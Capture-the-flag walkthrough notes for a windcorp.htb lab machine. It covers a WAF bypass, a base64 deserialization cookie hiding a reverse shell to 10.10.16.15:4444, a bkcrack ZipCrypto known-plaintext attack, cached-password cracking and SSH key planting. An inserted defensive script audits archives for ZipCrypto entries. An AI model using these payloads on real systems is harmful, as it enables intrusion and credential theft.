Ports 22 and 80 to begin with; subdomain portal.windcorp.htb
admin:admin works, but there's a WAF. It also looks like you can deserialize:
https://www.secjuice.com/modsecurity-vulnerability-cve-2019-19886/
Bypass (per the link above): send the cookie as cookie=base64payload=normalcookie
profile=eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2VjaG8gYzJnZ0xXa2dQaVlnTDJSbGRpOTBZM0F2TVRBdU1UQXVNVFl1TVRVdk5EUTBOQ0F3UGlZeCB8IGJhc2U2NCAtZCB8IGJhc2gnLCBmdW5jdGlvbihlcnJvciwgc3Rkb3V0LCBzdGRlcnIpIHsgY29uc29sZS5sb2coc3Rkb3V0KSB9KTt9KCkifQ===eyJ1c2VybmFtZSI6ImFkbWluIiwiYWRtaW4iOiIxIiwibG9nb24iOjE2Nzg5Mjk0ODQ2NjZ9
We can just make any web request; when the cookie is deserialized (to show our user on /) the payload executes.
There is a backup.zip.
7z l -slt backup.zip
shows that it contains sssd files and that some entries use ZipCrypto with the Store method.
https://www.anter.dev/posts/plaintext-attack-zipcrypto/
Store means uncompressed, so the known-plaintext attack applies. I'll find the largest file whose contents I can predict:
./bkcrack -L ../backup.zip | grep Store
cat /var/lib/sss/pubconf/krb5.include.d/krb5_libdefaults
###
[libdefaults]
udp_preference_limit = 0
###
./bkcrack -C ../backup.zip -c 'var/lib/sss/pubconf/krb5.include.d/krb5_libdefaults' -p ../krb5_libdefaults
[19:52:46] Keys
d6829d8d 8514ff97 afc3f825
Now let's clone the archive with a usable password:
./bkcrack -C ../backup.zip -k d6829d8d 8514ff97 afc3f825 -U bruh.zip easy
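A defensive counterpart to the steps above, added here and not part of these notes: an audit that flags archive entries still protected by legacy ZipCrypto, treating stored (uncompressed) entries with predictable content as the weakest case. Because Python's zipfile module cannot write encrypted entries, the sample archive is constructed by flipping the encryption flag bit in the headers; the entry names and contents are constructed for the example.

```python
import io
import struct
import zipfile

ENCRYPTED_FLAG = 0x1  # general-purpose flag bit 0: entry is encrypted
WINZIP_AES = 99       # compression method 99: WinZip AES, not ZipCrypto


def classify_entry(info: zipfile.ZipInfo) -> str:
    """Return a risk label for one archive entry from its header fields."""
    if not info.flag_bits & ENCRYPTED_FLAG:
        return "plaintext"
    if info.compress_type == WINZIP_AES:
        return "aes"
    # Legacy PKWARE ZipCrypto. A stored entry whose content is predictable
    # (a well-known config file, say) hands an attacker the known plaintext the
    # Biham-Kocher attack needs, so it is the weakest case.
    if info.compress_type == zipfile.ZIP_STORED:
        return "zipcrypto-stored"
    return "zipcrypto-compressed"


def audit_zip(data: bytes) -> dict:
    """Map each entry name to its label; only the central directory is read."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {zi.filename: classify_entry(zi) for zi in zf.infolist()}


def _set_encrypted_bit(data: bytes) -> bytes:
    """Constructed-sample helper: set the encryption bit in every local file
    header (flags at +6) and central directory header (flags at +8) so the
    archive presents as ZipCrypto-encrypted. Contents are never decrypted."""
    buf = bytearray(data)
    for sig, off in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
        pos = buf.find(sig)
        while pos != -1:
            (flags,) = struct.unpack_from("<H", buf, pos + off)
            struct.pack_into("<H", buf, pos + off, flags | ENCRYPTED_FLAG)
            pos = buf.find(sig, pos + 4)
    return bytes(buf)


def build_sample() -> bytes:
    """Constructed archive: one stored config file, one deflated blob."""
    mem = io.BytesIO()
    with zipfile.ZipFile(mem, "w") as zf:
        zf.writestr("var/lib/sss/pubconf/krb5.include.d/krb5_libdefaults",
                    "[libdefaults]\nudp_preference_limit = 0\n",
                    compress_type=zipfile.ZIP_STORED)
        zf.writestr("var/lib/sss/db/cache.ldb", b"\x00" * 4096,
                    compress_type=zipfile.ZIP_DEFLATED)
    return _set_encrypted_bit(mem.getvalue())
```

Anything labelled zipcrypto-* should be re-packed with AES (7z -mem=AES256 or zip -e on a build that supports it) or wrapped in an encrypted container; the stored entries are the ones a bkcrack-style attack recovers keys from first.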
Let's look for the cachedPassword:
strings ./var/lib/sss/db/cache_windcorp.htb.ldb
⇒ [email protected], pantera
(after cracking the cached hash with hashcat mode 1800, sha512crypt)
Put our public key into webster's authorized_keys and open a dynamic SSH forward (-D) now.
bruh
PORT STATE SERVICE
80/tcp open http
88/tcp open kerberos-sec
139/tcp closed netbios-ssn
445/tcp closed microsoft-ds
3389/tcp closed ms-wbt-server
5985/tcp closed wsman